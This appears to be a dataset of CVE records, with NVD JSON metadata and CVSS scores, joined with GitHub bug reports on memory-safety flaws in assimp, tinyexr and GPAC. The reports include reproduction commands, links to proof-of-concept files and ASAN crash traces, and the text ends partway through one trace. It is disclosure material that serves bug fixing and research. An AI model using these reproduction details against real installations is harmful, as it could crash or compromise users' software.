Using gdb to trace this PoC, the vulnerability occurs in line 340 of XFileImporter.cpp, due to `idx=16256` is larger than the capacity of `sourceMesh->mNormals` (24).
https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileImporter.cpp#L337-L342
After tracing it, I found that `pMesh->mNormals` assigned `numNormals` elements in line 514-519 of `XFileParser.cpp`, then line 535-536 saved the result of `ReadInt` to `pMesh->mNormFaces[a].mIndices` without checking if it is in the correct boundary (`<numNormals`). This eventually leads to the bug above.
https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileParser.cpp#L513-L541
# Suggested fix
Add a boundary check after `ReadInt` following the convention in line 410 below. Line 410 ensures the number read by `ReadInt` does not exceed the size of the vector.
https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileParser.cpp#L394-L415
| Bug: SEGV on unknown address still exists in Assimp::XFileImporter::CreateMeshes | https://api.github.com/repos/assimp/assimp/issues/4662/comments | 2 | 2022-07-26T13:16:46Z | 2025-05-23T16:56:35Z | https://github.com/assimp/assimp/issues/4662 | 1,318,230,977 | 4,662 | 4,104 |
CVE-2022-38529 | 2022-09-06T23:15:08.920 | tinyexr commit 0647fb3 was discovered to contain a heap-buffer overflow via the component rleUncompress. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinyexr/issues/169"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinyexr/issues/169"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinyexr_project:tinyexr:2022-06-28:*:*:*:*:*:*:*",
"matchCriteriaId": "DB72586A-37D9-4C6D-8CED-D429A2BD5C1C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/syoyo/tinyexr/issues/169 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"syoyo",
"tinyexr"
] | # Describe the issue
Heap-buffer-overflow still exists in the `rleUncompress`.
***This is similar to issue https://github.com/syoyo/tinyexr/issues/112, but it seems that the patch https://github.com/syoyo/tinyexr/commit/58a625894cfbb76da1d599e4f9768f099058e0e4 has not fully fixed them.***
# To Reproduce
*Environment*
- OS: Ubuntu 16.04.7 LTS
- Compiler: gcc version 5.4.0
*version:* latest commit https://github.com/syoyo/tinyexr/commit/0647fb3e0e65d21af354b43bdd9a0acf2913a996
*poc:* [poc](https://github.com/0xdd96/PoC/raw/main/tinyexr/tinyexr-rleUncompress-heap-buffer-overflow)
Steps to reproduce the behavior:
1. Compile TinyEXR with Address Sanitizer
```
CFLAGS="-g -O0 -fsanitize=address" CXXFLAGS="-g -O0 -fsanitize=address" cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release ..
```
2. run `./test_tinyexr ./poc`
Here is the trace reported by ASAN:
```
root@d8a714203f6e:# ./test_tinyexr poc
=================================================================
==14886==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006337 at pc 0x00000040c22d bp 0x7fffffffcb50 sp 0x7fffffffcb40
READ of size 1 at 0x619000006337 thread T0
#0 0x40c22c in rleUncompress tinyexr/tinyexr.h:1522
#1 0x40c22c in DecompressRle tinyexr/tinyexr.h:1625
#2 0x40c22c in DecodePixelData tinyexr/tinyexr.h:3786
#3 0x411318 in DecodeChunk tinyexr/tinyexr.h:5176
#4 0x41a3e9 in DecodeEXRImage tinyexr/tinyexr.h:5776
#5 0x41dcc7 in LoadEXRImageFromMemory tinyexr/tinyexr.h:6465
#6 0x41dcc7 in LoadEXRImageFromFile tinyexr/tinyexr.h:6442
#7 0x4288ae in LoadEXRWithLayer tinyexr/tinyexr.h:5954
#8 0x40502f in LoadEXR tinyexr/tinyexr.h:5902
#9 0x40502f in test_main tinyexr/test_tinyexr.cc:223
#10 0x40502f in main tinyexr/test_tinyexr.cc:194
#11 0x7ffff652883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#12 0x4053b8 in _start (tinyexr/build-gcc/test_tinyexr+0x4053b8)
0x619000006337 is located 0 bytes to the right of 951-byte region [0x619000005f80,0x619000006337)
allocated by thread T0 here:
#0 0x7ffff6f03532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532)
#1 0x41dc55 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104
#2 0x41dc55 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491
#3 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170
#4 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/5/bits/stl_vector.h:185
#5 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:136
#6 0x41dc55 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:278
#7 0x41dc55 in LoadEXRImageFromFile tinyexr/tinyexr.h:6432
SUMMARY: AddressSanitizer: heap-buffer-overflow tinyexr/tinyexr.h:1522 rleUncompress
Shadow bytes around the buggy address:
0x0c327fff8c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8c60: 00 00 00 00 00 00[07]fa fa fa fa fa fa fa fa fa
0x0c327fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==14886==ABORTING
``` | Heap-buffer-overflow still exists in the rleUncompress | https://api.github.com/repos/syoyo/tinyexr/issues/169/comments | 3 | 2022-07-06T03:10:33Z | 2022-07-14T07:32:10Z | https://github.com/syoyo/tinyexr/issues/169 | 1,295,059,789 | 169 | 4,105 |
CVE-2022-38530 | 2022-09-06T23:15:09.010 | GPAC v2.1-DEV-rev232-gfcaa01ebb-master was discovered to contain a stack overflow when processing ISOM_IOD. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2216"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/2216 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | **version info:**
```
root:# MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev232-gfcaa01ebb-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --prefix=/path_to_build --enable-debug --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
**poc:**[poc](https://github.com/0xdd96/PoC/raw/main/gpac/gpac-isom_iod-stack-overflow)
**command:** MP4Box -hint -out /dev/null $poc$
Here is the trace reported by ASAN:
```
root:# ./MP4Box -hint -out /dev/null poc
[ODF] Error reading descriptor (tag 4 size 14): Invalid MPEG-4 Descriptor
[iso file] Unknown box type tra7F in parent moov
[ODF] Not enough bytes (3) to read descriptor (size=93)
[ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor
[iso file] Read Box "esds" (start 5507) failed (Invalid MPEG-4 Descriptor) - skipping
[ODF] Not enough bytes (3) to read descriptor (size=93)
[ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor
[iso file] Unknown box type drB3f in parent dinf
[iso file] Missing dref box in dinf
[iso file] extra box maxr found in hinf, deleting
Hinting track ID 1 - Type "mp4v:mp4v" (mpeg4-generic) - BW 1393 kbps
Cannot create hinter (Invalid IsoMedia File)
Track ID 6 disabled - skipping hint
ASAN:DEADLYSIGNAL
=================================================================
==15396==ERROR: AddressSanitizer: stack-overflow on address 0x7fffff7feff8 (pc 0x7ffff6f1b64d bp 0x7ffff75d2320 sp 0x7fffff7ff000 T0)
#0 0x7ffff6f1b64c (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c)
#1 0x7ffff6f1b0e7 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x1030e7)
#2 0x7ffff6e40271 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x28271)
#3 0x7ffff6ef6b0a in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb0a)
#4 0x7ffff1cba647 in gf_malloc utils/alloc.c:150
#5 0x7ffff269f8e6 in gf_odf_new_isom_iod odf/odf_code.c:739
#6 0x7ffff268357e in gf_odf_create_descriptor odf/desc_private.c:77
#7 0x7ffff2684794 in gf_odf_parse_descriptor odf/descriptors.c:88
#8 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#9 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#10 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#11 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#12 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#13 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#14 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#15 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#16 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#17 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#18 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#19 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#20 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#21 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#22 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#23 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#24 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#25 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#26 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#27 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#28 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#29 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#30 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#31 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#32 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#33 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#34 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#35 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#36 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#37 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#38 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#39 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#40 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#41 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#42 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#43 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#44 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#45 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#46 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#47 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#48 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#49 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#50 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#51 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#52 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#53 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#54 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#55 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#56 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#57 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#58 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#59 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#60 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#61 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#62 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#63 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#64 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#65 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#66 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#67 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#68 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#69 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#70 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#71 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#72 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#73 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#74 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#75 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#76 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#77 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#78 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#79 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#80 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#81 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#82 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#83 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#84 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#85 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#86 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#87 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#88 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#89 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#90 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#91 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#92 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#93 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#94 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#95 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#96 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#97 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#98 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#99 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#100 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#101 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#102 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#103 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#104 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#105 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#106 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#107 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#108 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#109 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#110 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#111 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#112 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#113 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#114 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#115 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#116 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#117 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#118 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#119 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#120 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#121 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#122 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#123 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#124 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#125 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#126 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#127 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#128 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#129 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#130 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#131 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#132 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#133 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#134 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#135 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#136 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#137 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#138 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#139 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#140 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#141 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#142 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#143 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#144 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#145 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#146 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#147 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#148 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#149 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#150 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#151 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#152 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#153 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#154 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#155 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#156 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#157 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#158 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#159 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#160 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#161 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#162 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#163 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#164 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#165 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#166 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#167 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#168 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#169 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#170 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#171 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#172 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#173 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#174 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#175 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#176 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#177 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#178 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#179 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#180 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#181 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#182 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#183 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#184 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#185 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#186 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#187 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#188 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#189 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#190 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#191 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#192 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#193 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#194 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#195 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#196 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#197 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#198 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#199 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#200 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#201 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#202 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#203 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#204 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#205 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#206 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#207 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#208 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#209 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#210 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#211 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#212 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#213 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#214 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#215 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#216 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#217 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#218 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#219 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#220 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
